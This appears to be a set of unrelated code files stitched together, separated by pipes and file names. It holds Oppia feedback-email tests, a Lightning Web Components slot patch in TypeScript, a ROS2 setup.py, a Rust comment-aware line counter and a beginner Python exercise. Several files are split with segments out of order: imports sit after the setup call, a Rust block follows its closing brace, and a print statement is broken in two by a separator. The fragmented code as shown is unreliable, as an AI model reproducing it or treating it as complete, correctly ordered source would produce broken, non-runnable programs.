feedback_services.create_message(
thread_id, self.editor_id, None, None, 'editor message')
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 0)
self.process_and_flush_pending_tasks()
feedback_services.create_message(
thread_id, self.editor_id, None, None, 'editor message2')
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 0)
self.process_and_flush_pending_tasks()
def test_that_reply_to_id_is_created(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'A message')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.user_id_b, None, None, 'user b message')
# Check that reply_to id is created for user A.
queried_object = (
email_services
.get_feedback_thread_reply_info_by_user_and_thread_ids(
self.user_id_a, thread_id))
self.assertEqual(queried_object.user_id, self.user_id_a)
self.assertEqual(queried_object.thread_id, thread_id)
feedback_services.create_message(
thread_id, self.user_id_a, None, None, 'user a message')
# Check that reply_to id is created for user B.
queried_object = (
email_services
.get_feedback_thread_reply_info_by_user_and_thread_ids(
self.user_id_b, thread_id))
self.assertEqual(queried_object.user_id, self.user_id_b)
self.assertEqual(queried_object.thread_id, thread_id)
class FeedbackMessageBatchEmailHandlerTests(test_utils.GenericTestBase):
def setUp(self):
super(FeedbackMessageBatchEmailHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
self.new_user_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
self.exploration = self.save_new_default_exploration(
'A', self.editor_id, title='Title')
self.can_send_emails_ctx = self.swap(
feconf, 'CAN_SEND_EMAILS', True)
self.can_send_feedback_email_ctx = self.swap(
feconf, 'CAN_SEND_FEEDBACK_MESSAGE_EMAILS', True)
def test_that_emails_are_sent(self):
expected_email_html_body = (
'Hi editor,<br>'
'<br>'
'You\'ve received a new message on your Oppia explorations:<br>'
'<ul>'
'<li><a href="https://www.oppia.org/create/A#/feedback">Title</a>:'
'<br>'
'<ul><li>some text<br></li>'
'</ul></li></ul>'
'You can view and reply to your messages from your '
'<a href="https://www.oppia.org/creator_dashboard">dashboard</a>.'
'<br>'
'<br>Thanks, and happy teaching!<br>'
'<br>'
'Best wishes,<br>'
'The Oppia Team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body = (
'Hi editor,\n'
'\n'
'You\'ve received a new message on your Oppia explorations:\n'
'- Title:\n'
'- some text\n'
'You can view and reply to your messages from your dashboard.\n'
'\n'
'Thanks, and happy teaching!\n'
'\n'
'Best wishes,\n'
'The Oppia Team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
messagelist = feedback_services.get_messages(thread_id)
self.assertEqual(len(messagelist), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body)
def test_that_correct_emails_are_sent_for_multiple_feedback(self):
expected_email_html_body = (
'Hi editor,<br>'
'<br>'
'You\'ve received 2 new messages on your Oppia explorations:<br>'
'<ul>'
'<li><a href="https://www.oppia.org/create/A#/feedback">Title</a>:'
'<br>'
'<ul><li>some text<br></li>'
'<li>more text<br></li>'
'</ul></li></ul>'
'You can view and reply to your messages from your '
'<a href="https://www.oppia.org/creator_dashboard">dashboard</a>.'
'<br>'
'<br>Thanks, and happy teaching!<br>'
'<br>'
'Best wishes,<br>'
'The Oppia Team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body = (
'Hi editor,\n'
'\n'
'You\'ve received 2 new messages on your Oppia explorations:\n'
'- Title:\n'
'- some text\n'
'- more text\n'
'You can view and reply to your messages from your dashboard.\n'
'\n'
'Thanks, and happy teaching!\n'
'\n'
'Best wishes,\n'
'The Oppia Team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.new_user_id,
feedback_models.STATUS_CHOICES_OPEN, 'subject', 'more text')
messagelist = feedback_services.get_messages(thread_id)
self.assertEqual(len(messagelist), 2)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(
to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body)
def test_that_emails_are_not_sent_if_already_seen(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_csrf_token_from_response(
self.testapp.get('/create/%s' % self.exploration.id))
self.post_json(
'%s/%s' % (
feconf.FEEDBACK_THREAD_VIEW_EVENT_URL, thread_id),
{'thread_id': thread_id}, csrf_token=csrf_token)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
class FeedbackMessageInstantEmailHandlerTests(test_utils.GenericTestBase):
def setUp(self):
super(FeedbackMessageInstantEmailHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
self.new_user_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
self.exploration = self.save_new_default_exploration(
'A', self.editor_id, title='Title')
self.can_send_emails_ctx = self.swap(
feconf, 'CAN_SEND_EMAILS', True)
self.can_send_feedback_email_ctx = self.swap(
feconf, 'CAN_SEND_FEEDBACK_MESSAGE_EMAILS', True)
def test_that_emails_are_sent_for_feedback_message(self):
expected_email_html_body = (
'Hi newuser,<br><br>'
'New update to thread "a subject" on '
'<a href="https://www.oppia.org/create/A#/feedback">Title</a>:<br>'
'<ul><li>editor: editor message<br></li></ul>'
'(You received this message because you are a '
'participant in this thread.)<br><br>'
'Best wishes,<br>'
'The Oppia team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body = (
'Hi newuser,\n'
'\n'
'New update to thread "a subject" on Title:\n'
'- editor: editor message\n'
'(You received this message because you are a'
' participant in this thread.)\n'
'\n'
'Best wishes,\n'
'The Oppia team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id, None, None, 'editor message')
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.NEW_USER_EMAIL)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body)
def test_that_emails_are_sent_for_status_change(self):
expected_email_html_body = (
'Hi newuser,<br><br>'
'New update to thread "a subject" on '
'<a href="https://www.oppia.org/create/A#/feedback">Title</a>:<br>'
'<ul><li>editor: changed status from open to fixed<br></li></ul>'
'(You received this message because you are a '
'participant in this thread.)<br><br>'
'Best wishes,<br>'
'The Oppia team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body = (
'Hi newuser,\n'
'\n'
'New update to thread "a subject" on Title:\n'
'- editor: changed status from open to fixed\n'
'(You received this message because you are a'
' participant in this thread.)\n'
'\n'
'Best wishes,\n'
'The Oppia team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id,
feedback_models.STATUS_CHOICES_FIXED, None, '')
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.NEW_USER_EMAIL)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body)
def test_that_emails_are_sent_for_both_status_change_and_message(self):
expected_email_html_body_message = (
'Hi newuser,<br><br>'
'New update to thread "a subject" on '
'<a href="https://www.oppia.org/create/A#/feedback">Title</a>:<br>'
'<ul><li>editor: editor message<br></li></ul>'
'(You received this message because you are a '
'participant in this thread.)<br><br>'
'Best wishes,<br>'
'The Oppia team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body_message = (
'Hi newuser,\n'
'\n'
'New update to thread "a subject" on Title:\n'
'- editor: editor message\n'
'(You received this message because you are a'
' participant in this thread.)\n'
'\n'
'Best wishes,\n'
'The Oppia team\n'
'\n'
'You can change your email preferences via the Preferences page.')
expected_email_html_body_status = (
'Hi newuser,<br><br>'
'New update to thread "a subject" on '
'<a href="https://www.oppia.org/create/A#/feedback">Title</a>:<br>'
'<ul><li>editor: changed status from open to fixed<br></li></ul>'
'(You received this message because you are a '
'participant in this thread.)<br><br>'
'Best wishes,<br>'
'The Oppia team<br>'
'<br>'
'You can change your email preferences via the '
'<a href="https://www.example.com">Preferences</a> page.')
expected_email_text_body_status = (
'Hi newuser,\n'
'\n'
'New update to thread "a subject" on Title:\n'
'- editor: changed status from open to fixed\n'
'(You received this message because you are a'
' participant in this thread.)\n'
'\n'
'Best wishes,\n'
'The Oppia team\n'
'\n'
'You can change your email preferences via the Preferences page.')
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.new_user_id, 'a subject', 'some text')
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id,
feedback_models.STATUS_CHOICES_FIXED, None,
'editor message')
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.NEW_USER_EMAIL)
self.assertEqual(len(messages), 2)
self.assertEqual(
messages[0].html.decode(), expected_email_html_body_status)
self.assertEqual(
messages[0].body.decode(), expected_email_text_body_status)
self.assertEqual(
messages[1].html.decode(), expected_email_html_body_message)
self.assertEqual(
messages[1].body.decode(), expected_email_text_body_message)
def test_that_emails_are_not_sent_to_anonymous_user(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
            # Create thread as anonymous user.
feedback_services.create_thread(
'exploration', self.exploration.id,
None, 'a subject', 'some text')
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id,
feedback_models.STATUS_CHOICES_FIXED, None,
'editor message')
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages()
self.assertEqual(len(messages), 0)
| EmailsTaskqueueTests |
slot.ts | /*
* Copyright (c) 2018, salesforce.com, inc.
* All rights reserved.
* SPDX-License-Identifier: MIT
* For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/MIT
*/
import {
assert,
defineProperties,
ArrayFilter,
ArrayIndexOf,
ArrayPush,
ArrayReduce,
ArraySlice,
forEach,
isNull,
isTrue,
isUndefined,
} from '@lwc/shared';
import {
getAttribute,
setAttribute,
assignedSlotGetter as originalElementAssignedSlotGetter,
shadowRootGetter,
} from '../env/element';
import { assignedSlotGetter as originalTextAssignedSlotGetter } from '../env/text';
import { dispatchEvent } from '../env/event-target';
import { MutationObserverObserve, MutationObserver } from '../env/mutation-observer';
import { childNodesGetter, parentNodeGetter } from '../env/node';
import {
assignedNodes as originalAssignedNodes,
assignedElements as originalAssignedElements,
} from '../env/slot';
import { isInstanceOfNativeShadowRoot } from '../env/shadow-root';
import {
isSlotElement,
getNodeOwner,
getAllMatches,
getFilteredChildNodes,
getFilteredSlotAssignedNodes,
} from '../faux-shadow/traverse';
import { getNodeOwnerKey, isNodeShadowed } from '../shared/node-ownership';
import { createStaticNodeList } from '../shared/static-node-list';
import { arrayFromCollection } from '../shared/utils';
// We can use a single observer without having to worry about leaking because
// "Registered observers in a node’s registered observer list have a weak
// reference to the node."
// https://dom.spec.whatwg.org/#garbage-collection
let observer: MutationObserver | undefined;
const observerConfig: MutationObserverInit = { childList: true };
const SlotChangeKey = new WeakMap<any, boolean>();
function initSlotObserver() {
return new MutationObserver((mutations) => {
const slots: Node[] = [];
forEach.call(mutations, (mutation) => {
if (process.env.NODE_ENV !== 'production') {
assert.invariant(
mutation.type === 'childList',
`Invalid mutation type: ${mutation.type}. This mutation handler for slots should only handle "childList" mutations.`
);
}
const { target: slot } = mutation;
if (ArrayIndexOf.call(slots, slot) === -1) {
ArrayPush.call(slots, slot);
dispatchEvent.call(slot, new CustomEvent('slotchange'));
}
});
});
}
function getFilteredSlotFlattenNodes(slot: HTMLElement): Node[] {
const childNodes = arrayFromCollection(childNodesGetter.call(slot));
// TypeScript is inferring the wrong function type for this particular
// overloaded method: https://github.com/Microsoft/TypeScript/issues/27972
// @ts-ignore type-mismatch
return ArrayReduce.call(
childNodes,
(seed, child) => {
if (child instanceof Element && isSlotElement(child)) {
ArrayPush.apply(seed, getFilteredSlotFlattenNodes(child));
} else {
ArrayPush.call(seed, child);
}
return seed;
},
[]
);
}
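// Illustrative sketch (not part of the original file; the markup below is
// hypothetical): flattening recurses through nested slot elements, so for
//   <slot id="outer"><slot id="inner"><span></span></slot></slot>
// getFilteredSlotFlattenNodes(outer) returns [span]: the inner <slot> is
// replaced by its own flattened children, mirroring the semantics of
// assignedNodes({ flatten: true }).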
export function assignedSlotGetterPatched(this: Element | Text): HTMLSlotElement | null {
const parentNode = parentNodeGetter.call(this);
// use the original assignedSlot if the parent has a native shadow root
if (parentNode instanceof Element) {
const sr = shadowRootGetter.call(parentNode);
if (isInstanceOfNativeShadowRoot(sr)) {
if (this instanceof Text) {
return originalTextAssignedSlotGetter.call(this);
}
return originalElementAssignedSlotGetter.call(this);
}
}
/**
* The node is assigned to a slot if:
* - it has a parent and its parent is a slot element
* - and if the slot owner key is different than the node owner key.
*
* When the slot and the slotted node are 2 different shadow trees, the owner keys will be
* different. When the slot is in a shadow tree and the slotted content is a light DOM node,
* the light DOM node doesn't have an owner key and therefore the slot owner key will be
* different than the node owner key (always `undefined`).
*/
if (
!isNull(parentNode) &&
isSlotElement(parentNode) &&
getNodeOwnerKey(parentNode) !== getNodeOwnerKey(this)
) {
return parentNode;
}
return null;
}
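// Illustrative sketch (assumption, not in the original file): in a faux
// shadow tree the ownership check above resolves assignedSlot as follows,
// where keyA and keyB are hypothetical owner keys.
//
//   <slot>                  // getNodeOwnerKey(slot) === keyA
//     <span>hello</span>    // slotted light DOM node, key keyB or undefined
//
//   span.assignedSlot === slot // parent is a slot and the keys differ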
defineProperties(HTMLSlotElement.prototype, {
addEventListener: {
value(
this: HTMLSlotElement,
type: string,
listener: EventListener,
options?: boolean | AddEventListenerOptions
) {
// super.addEventListener - but that doesn't work with TypeScript
HTMLElement.prototype.addEventListener.call(this, type, listener, options);
if (type === 'slotchange' && !SlotChangeKey.get(this)) {
SlotChangeKey.set(this, true);
if (!observer) {
observer = initSlotObserver();
}
MutationObserverObserve.call(observer, this, observerConfig);
}
},
writable: true,
enumerable: true,
configurable: true,
},
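// Usage sketch (assumption, not in the original file): the mutation
// observer is created lazily on the first slotchange subscription, so
//   slot.addEventListener('slotchange', () => { /* react to changes */ });
// both registers the listener and starts childList observation on the slot.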
assignedElements: {
value(this: HTMLSlotElement, options?: AssignedNodesOptions): Element[] {
if (isNodeShadowed(this)) {
const flatten = !isUndefined(options) && isTrue(options.flatten);
const nodes = flatten
? getFilteredSlotFlattenNodes(this)
: getFilteredSlotAssignedNodes(this);
return ArrayFilter.call(nodes, (node) => node instanceof Element);
} else {
return originalAssignedElements.apply(
this,
ArraySlice.call(arguments) as [AssignedNodesOptions]
);
}
},
writable: true,
enumerable: true,
configurable: true,
},
assignedNodes: {
value(this: HTMLSlotElement, options?: AssignedNodesOptions): Node[] {
if (isNodeShadowed(this)) { | : getFilteredSlotAssignedNodes(this);
} else {
return originalAssignedNodes.apply(
this,
ArraySlice.call(arguments) as [AssignedNodesOptions]
);
}
},
writable: true,
enumerable: true,
configurable: true,
},
name: {
get(this: HTMLSlotElement): string {
const name = getAttribute.call(this, 'name');
return isNull(name) ? '' : name;
},
set(this: HTMLSlotElement, value: string) {
setAttribute.call(this, 'name', value);
},
enumerable: true,
configurable: true,
},
childNodes: {
get(this: HTMLSlotElement): NodeListOf<Node> {
if (isNodeShadowed(this)) {
const owner = getNodeOwner(this);
const childNodes = isNull(owner)
? []
: getAllMatches(owner, getFilteredChildNodes(this));
return createStaticNodeList(childNodes);
}
return childNodesGetter.call(this);
},
enumerable: true,
configurable: true,
},
}); | const flatten = !isUndefined(options) && isTrue(options.flatten);
return flatten
? getFilteredSlotFlattenNodes(this) |
setup.py | import os |
package_name = 'ros2_sub'
setup(
name=package_name,
version='0.0.0',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
(os.path.join('share', package_name), glob('launch/*.py')),
],
install_requires=['setuptools'],
zip_safe=True,
maintainer='ragesh_ramachandran',
maintainer_email='[email protected]',
description='TODO: Package description',
license='TODO: License declaration',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'number_subscriber = ros2_sub.main:main'
],
},
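# Usage note (not part of the original file): after building the workspace
# with `colcon build` and sourcing it, the console script declared above is
# typically run as:
#   ros2 run ros2_sub number_subscriber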
) | from glob import glob
from setuptools import setup |
main.rs | #[cfg(test)]
mod test;
fn main() {
let mut args = std::env::args();
args.next();
let mut sum = 0;
for arg in args {
match std::fs::read_to_string(arg.as_str()) {
Ok(content) => {
let count = count(content.as_str());
sum += count;
println!("{}: {} lines", arg, count);
},
Err(_) => {
println!("{}: could not read file!", arg);
}
}
}
println!("\nsum: {} lines",sum);
}
struct CounterStatus {
counter: usize,
slash: bool,
new_line: bool,
}
impl CounterStatus {
fn new() -> CounterStatus {
CounterStatus {
counter: 0,
slash: false,
new_line: true,
}
}
}
fn count(text: &str) -> usize {
let mut status = CounterStatus::new();
for c in text.chars() {
if c == '\n' {
status.new_line = true;
}
else if c == '/' {
count_handle_slash(&mut status)
}
else {
count_normal_char(&mut status, c)
}
}
status.counter
}
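// Illustrative sketch (not part of the original file): expected behaviour
// of `count` under the rules implemented below; a line whose leading
// characters (ignoring spaces) start with "//" is a comment, and blank
// lines are skipped.
//
// assert_eq!(count("fn main() {}\n"), 1);
// assert_eq!(count("// comment\nlet x = 1;\n"), 1);
// assert_eq!(count("\n\n"), 0);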
fn count_handle_slash(status: &mut CounterStatus) {
if status.new_line {
if status.slash {
status.slash = false;
status.new_line = false;
}
else {
status.slash = true;
}
}
}
fn count_normal_char(status: &mut CounterStatus, c: char) {
status.slash = false;
if c != ' ' && status.new_line |
} | {
status.counter += 1;
status.new_line = false;
} |
Programa que le 5 numeros.py | # Write a program that reads 5 numbers and reports their sum and average.
cont = 0
s = 0
m = 0
for i in range(5):
n = float(input("Enter a number: "))
s = s + n
cont = cont + 1
m = s / cont
print(s)
print(m)
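# Worked check (not part of the original file): for inputs 1, 2, 3, 4, 5
# the loop accumulates s = 15.0 and m = 15.0 / 5 = 3.0.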
'''
'''
# 4)
i = 0
while i < 50:
if (i % 2) == 1:
prin | i=i+1
| t (i)
|